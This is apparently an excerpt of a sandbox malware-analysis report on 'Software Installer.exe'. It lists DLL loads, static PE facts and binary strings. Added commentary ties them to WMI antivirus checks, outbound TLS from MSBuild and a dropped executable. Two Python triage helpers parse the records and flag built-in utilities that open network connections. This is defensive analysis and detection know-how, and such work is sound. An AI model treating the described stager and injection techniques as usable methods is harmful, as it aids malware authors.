Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: wshunix.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Software Installer.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe Section loaded: apphelp.dll
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Software Installer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
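The "Section loaded" records above are per-process DLL loads, and they say more as a set than line by line: the sample itself pulls in winhttp.dll together with the schannel.dll/ncrypt.dll/ncryptsslp.dll stack (an HTTPS client); the powershell.exe instances load wbemcomn.dll, wmidcom.dll and mi.dll (WMI, which is how the "Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)" signature fires) plus dpapi.dll; and MSBuild.exe, a build tool, loads winhttp.dll, dnsapi.dll and schannel.dll, which is the outbound TLS activity behind the "Silenttrinity Stager Msbuild Activity" Sigma hit. The Python below is an added triage helper and is not part of the Joe Sandbox report: it parses records in the raw extracted form (fused "exeSection loaded", optional trailing "Jump to behavior" link text) as well as the cleaned form, tags each process by DLL family, and flags binaries that have no business speaking TLS. The DLL-to-family table and the NETWORK_UNEXPECTED list are assumptions made for this example, and the sample records are a constructed subset copied from the report.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the report's "Section loaded" records,
# kept in the raw extracted form so the parser has to cope with it.
SAMPLE_RECORDS = r"""
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeSection loaded: apphelp.dllJump to behavior
"""

# Tolerates both the fused form ("...exeSection loaded:") and a spaced one,
# and ignores the "Jump to behavior" link text that follows the DLL name.
RECORD_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*Section loaded:\s*(?P<dll>[\w.\-]+\.dll)",
    re.IGNORECASE,
)

# DLL families that hint at what a process is doing. This mapping is an
# assumption for the example, not a table taken from the report.
DLL_FAMILIES = {
    "network": {"winhttp.dll", "wininet.dll", "mswsock.dll", "dnsapi.dll", "iphlpapi.dll"},
    "tls": {"schannel.dll", "ncryptsslp.dll", "mskeyprotect.dll"},
    "wmi": {"wbemcomn.dll", "wmidcom.dll", "mi.dll", "miutils.dll"},
    "dpapi": {"dpapi.dll"},
    "amsi": {"amsi.dll"},
}

# Legitimate .NET utility binaries that should not be opening TLS connections
# on a workstation (assumption for the example; MSBuild.exe is the one the
# report's Sigma rule names).
NETWORK_UNEXPECTED = {"msbuild.exe", "installutil.exe", "regsvcs.exe", "regasm.exe"}


def parse_records(text):
    """Yield (process basename, lower-cased dll name) pairs from raw report lines."""
    for line in text.splitlines():
        m = RECORD_RE.search(line)
        if m:
            proc = m.group("proc").replace("/", "\\").rsplit("\\", 1)[-1]
            yield proc, m.group("dll").lower()


def classify(text):
    """Return {process: sorted list of family tags} for every process seen."""
    loaded = defaultdict(set)
    for proc, dll in parse_records(text):
        loaded[proc].add(dll)
    return {
        proc: sorted(tag for tag, dlls in DLL_FAMILIES.items() if dlls & mods)
        for proc, mods in loaded.items()
    }


def flag_lolbin_network(text):
    """Processes from NETWORK_UNEXPECTED that loaded both a network and a TLS stack."""
    return sorted(
        proc
        for proc, tags in classify(text).items()
        if proc.lower() in NETWORK_UNEXPECTED and {"network", "tls"} <= set(tags)
    )


if __name__ == "__main__":
    for proc, tags in classify(SAMPLE_RECORDS).items():
        print(f"{proc}: {', '.join(tags) or '-'}")
    print("LOLBin with network+TLS:", flag_lolbin_network(SAMPLE_RECORDS))
```

Run against the full record list, the same tags show that the dropped Microsoft_Driver_vs_2019.exe loads nothing beyond apphelp.dll and kernel.appcore.dll in this trace, so its payload is executed elsewhere, consistent with the injection signatures in the overview.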
Source: Software Installer.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Software Installer.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Software Installer.exeStatic file information: File size 68821148 > 1048576
Source: Software Installer.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61ac00
Source: Software Installer.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17ca00
Source: Software Installer.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x147400
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Software Installer.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
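The static PE lines above are plain header facts: a 64-bit (PE32+) image based at 0x140000000, which is the linker default for x64 executables rather than anything unusual; DllCharacteristics HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF and TERMINAL_SERVER_AWARE, i.e. ASLR with 64-bit entropy, DEP and Control Flow Guard all enabled; six populated data directories; and .text, .rdata and .rsrc sections each larger than 1 MiB, in line with the 68 MB file size. The script below is an added example, not part of the report or of any Joe Sandbox tooling: it reads those fields straight out of the headers with struct (no pefile dependency) and, so that it runs offline, builds a constructed PE32+ header carrying the report's values. The flag and directory tables are standard PE constants; the sample header is constructed for the demo and contains no code.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits in ascending order (standard PE constants).
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

# IMAGE_DIRECTORY_ENTRY_* names by index (standard PE constants).
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG",
    "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]

BIG = 0x100000  # 1 MiB, the threshold behind the report's "bigger than" lines


def static_pe_facts(data, big=BIG):
    """Extract the fields behind the report's static lines from a PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24  # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ (64-bit) images are handled in this example")
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + 108)[0]
    dirs = [
        DIRECTORY_NAMES[i]
        for i in range(min(ndirs, 16))
        if struct.unpack_from("<II", data, opt + 112 + 8 * i) != (0, 0)
    ]
    sect_off = opt + opt_size  # section table starts right after the optional header
    sections = []
    for i in range(nsect):
        name, vsize, _va, rsize = struct.unpack_from("<8sIII", data, sect_off + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii"), vsize, rsize))
    return {
        "image_base": image_base,
        "image_base_above_0x60000000": image_base > 0x60000000,
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dllchar & bit],
        "data_directories": dirs,
        "big_sections": [(n, hex(r)) for n, v, r in sections if r > big or v > big],
    }


def build_sample_pe():
    """Constructed, headers-only PE32+ image whose values mirror the report's static lines."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew
    sections = [(b".text", 0x61AC00), (b".rdata", 0x17CA00), (b".rsrc", 0x147400), (b".reloc", 0x1000)]
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)  # PE32+ optional header with all 16 directory slots
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<Q", opt, 24, 0x140000000)
    struct.pack_into("<H", opt, 70, 0x0020 | 0x0040 | 0x0100 | 0x4000 | 0x8000)
    struct.pack_into("<I", opt, 108, 16)
    for idx in (1, 2, 5, 6, 10, 12):  # IMPORT, RESOURCE, BASERELOC, DEBUG, LOAD_CONFIG, IAT
        struct.pack_into("<II", opt, 112 + 8 * idx, 0x1000 * (idx + 1), 0x100)
    sect = b"".join(
        struct.pack("<8sIIIIIIHHI", name, size, 0x1000 * (i + 1), size, 0x400, 0, 0, 0, 0, 0)
        for i, (name, size) in enumerate(sections)
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect


if __name__ == "__main__":
    for key, value in static_pe_facts(build_sample_pe()).items():
        print(f"{key}: {value}")
```

To run it on the real sample, pass `open(path, "rb").read()` to `static_pe_facts`; the same offsets apply because the fields are read by position in the optional header, not by walking sections.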
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Software Installer.exe, 00000000.00000002.2652976429.000001D775200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655712102.000001D7781F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655625974.000001D778160000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649808115.000001D7732F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648012640.00000196DE210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdb source: Software Installer.exe, 00000000.00000002.2655586732.000001D778140000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652602234.000001D775061000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652996729.000001D775210000.00000004.10000000.00040000.00000000.sdmp
